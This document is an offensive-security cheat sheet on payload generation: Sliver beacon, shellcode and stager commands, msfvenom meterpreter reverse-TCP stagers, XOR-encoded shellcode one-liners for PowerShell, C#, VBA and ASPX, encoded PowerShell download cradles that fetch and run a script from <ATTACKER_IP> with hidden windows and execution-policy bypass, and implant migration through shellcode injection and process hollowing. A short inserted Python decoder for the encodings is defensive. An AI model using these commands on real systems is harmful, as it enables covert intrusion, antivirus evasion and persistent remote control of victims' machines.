Payload Generation
Sliver native implants, MSFVenom stagers, XOR-encoded output formats, encoded cradles, and implant migration.
Native Implants
Generate Beacon (EXE)
sliver > generate beacon --http <ATTACKER_IP>:8088 --name sliver.obfuscated --os windows --seconds 5 --jitter 0 --evasion
--seconds 5 --jitter 0: 5s callback interval
--evasion: apply built-in evasion techniques
Generate Shellcode
sliver > generate --http <ATTACKER_IP>:8088 --os windows --arch amd64 --format shellcode --save ./beacon.bin
Generate Stager
sliver > generate stager --lhost <ATTACKER_IP> --lport 443 --protocol mtls --os windows --arch amd64 --format shellcode --save ./stager.bin
MSFVenom Stagers
Generate stagers that connect to Sliver stage-listeners:
# 64-bit raw shellcode
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=tun0 LPORT=4443 EXITFUNC=thread -f raw -o sliver.x64.bin
# 32-bit raw shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST=tun0 LPORT=5553 EXITFUNC=thread -f raw -o sliver.x86.bin
Use --prepend-size on the Sliver stage-listener when using msfvenom stagers.
XOR-Encoded Output Formats (One-Liners)
All use XOR key=2. Pipe msfvenom output directly into a Python encoder.
PowerShell (x64)
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=tun0 LPORT=4443 EXITFUNC=thread -f raw | xxd -ps -c 1 | python3 -c 'import sys; key = 2; print("[Byte[]] $buf = " + ",".join([f"0x{(int(x, 16) ^ key):02X}" for x in sys.stdin.read().split()]))'
C#
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=tun0 LPORT=4443 EXITFUNC=thread -f raw | python3 -c 'key = 2; import sys; data = sys.stdin.buffer.read(); encrypted = bytes([b ^ key for b in data]); print(f"byte[] buf = new byte[{len(encrypted)}] {{ " + ", ".join([f"0x{b:02X}" for b in encrypted]) + " };")'
VBA (x86)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=tun0 LPORT=5553 EXITFUNC=thread -f raw | xxd -ps -c 1 | python3 -c 'import sys; key = 2; data = [str(int(x, 16) ^ key) for x in sys.stdin.read().split()]; chunk_size = 50; chunks = [data[i:i + chunk_size] for i in range(0, len(data), chunk_size)]; print("buf = Array(", end=""); print(", _\n".join([", ".join(chunk) for chunk in chunks]) + ")")'
ASPX
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=tun0 LPORT=4443 EXITFUNC=thread -f raw | python3 -c 'key = 2; import sys; data = sys.stdin.buffer.read(); encrypted = bytes([b ^ key for b in data]); print(f"byte[] vL8fwOy_ = new byte[{len(encrypted)}] {{ " + ",".join([f"0x{b:02X}" for b in encrypted]) + " };")'
Encoded PowerShell Cradles
Base64 encode a download cradle:
echo -en "(New-Object System.Net.WebClient).DownloadString('http://<ATTACKER_IP>/payload.ps1') | IEX" | iconv -t UTF-16LE | base64 -w 0
Execute:
powershell -enc <BASE64_STRING>
VBA string encoding (Caesar, key=17):
payload="powershell -exec bypass -nop -w hidden -c iex((new-object system.net.webclient).downloadstring('http://<ATTACKER_IP>/payload.txt'))"
python3 -c "payload=\"$payload\"; print(''.join(f'{ord(char) + 17:03}' for char in payload))"
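Added here as analyst-side tooling, not code from the page: a small Python decoder that reverses the two encodings above, the single-byte XOR (key 2) behind the PowerShell, C#, ASPX and VBA byte arrays, and the 3-digit Caesar (+17) string encoding, so a recovered script or macro can be turned back into its raw content for triage. The sample inputs are constructed and hold harmless ASCII text.

```python
import re

# Analyst-side decoders for the encoded output formats above (added example, not page code).
HEX_BYTE = re.compile(r"0x([0-9A-Fa-f]{2})")
VBA_ARRAY = re.compile(r"Array\((.*?)\)", re.S)


def extract_bytes(text: str) -> bytes:
    """Pull the byte array out of the PowerShell/C#/ASPX (0xNN) or VBA (decimal Array(...)) forms."""
    hex_tokens = HEX_BYTE.findall(text)
    if hex_tokens:
        return bytes(int(t, 16) for t in hex_tokens)
    m = VBA_ARRAY.search(text)
    if m:
        # The VBA emitter splits the array with ", _" line continuations; strip the markers first
        body = m.group(1).replace("_", "")
        return bytes(int(t) for t in re.findall(r"\d+", body))
    return b""


def xor_decode(data: bytes, key: int = 2) -> bytes:
    """Undo the single-byte XOR; every one-liner above uses key=2."""
    return bytes(b ^ key for b in data)


def decode_byte_array(text: str, key: int = 2) -> bytes:
    """Recovered script text in, raw decoded bytes out."""
    return xor_decode(extract_bytes(text), key)


def caesar_decode(encoded: str, shift: int = 17) -> str:
    """Reverse the VBA string encoding: each char was written as ord(char)+shift, zero-padded to 3 digits."""
    if not encoded.isdigit() or len(encoded) % 3:
        raise ValueError("expected a run of 3-digit decimal groups")
    return "".join(chr(int(encoded[i:i + 3]) - shift) for i in range(0, len(encoded), 3))


# Constructed samples (not real captures): the byte arrays all hold the ASCII text "Hello" XORed with 2,
# and the Caesar sample is the string "Get-Date" shifted by 17.
SAMPLE_PS = "[Byte[]] $buf = 0x4A,0x67,0x6E,0x6E,0x6D"
SAMPLE_CS = "byte[] buf = new byte[5] { 0x4A, 0x67, 0x6E, 0x6E, 0x6D };"
SAMPLE_VBA = "buf = Array(74, 103, _\n110, 110, 109)"
SAMPLE_CAESAR = "088118133062085114133118"

if __name__ == "__main__":
    for name, sample in (("PowerShell", SAMPLE_PS), ("C#", SAMPLE_CS), ("VBA", SAMPLE_VBA)):
        print(name, decode_byte_array(sample))
    print("Caesar", caesar_decode(SAMPLE_CAESAR))
```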
Implant Migration
Migrate your implant into another process for stability and to survive parent process closure.
Create Sacrificial Process
# x64 notepad
execute C:\windows\system32\notepad.exe
# x86 notepad
execute C:\windows\SysWOW64\notepad.exe
# Via Rubeus (creates process with different token)
rubeus -t 20 -- createnetonly /program:C:\windows\SysWOW64\notepad.exe
Find Target PID
ps -e notepad
ps -e explorer # explorer is more stable
Migrate
# migrate command (best for x86 with AV)
migrate -p <PID>
# execute-shellcode (x86)
execute-shellcode -p <PID> /path/to/sliver.x86.bin
# execute-shellcode (x64)
execute-shellcode -p <PID> /path/to/sliver.x64.bin
# execute-shellcode with shikata_ga_nai
execute-shellcode -S -r -I 10 -p <PID> /path/to/sliver.x64.bin
Process Hollowing (Recommended)
hollow svchost.exe /path/to/sliver.x64.bin
You may get "Call extension error: rpc error: code = Unknown desc = The parameter is incorrect", but the shell will be received regardless.
See also: 3. Beacons & Listeners, Generation & Encoding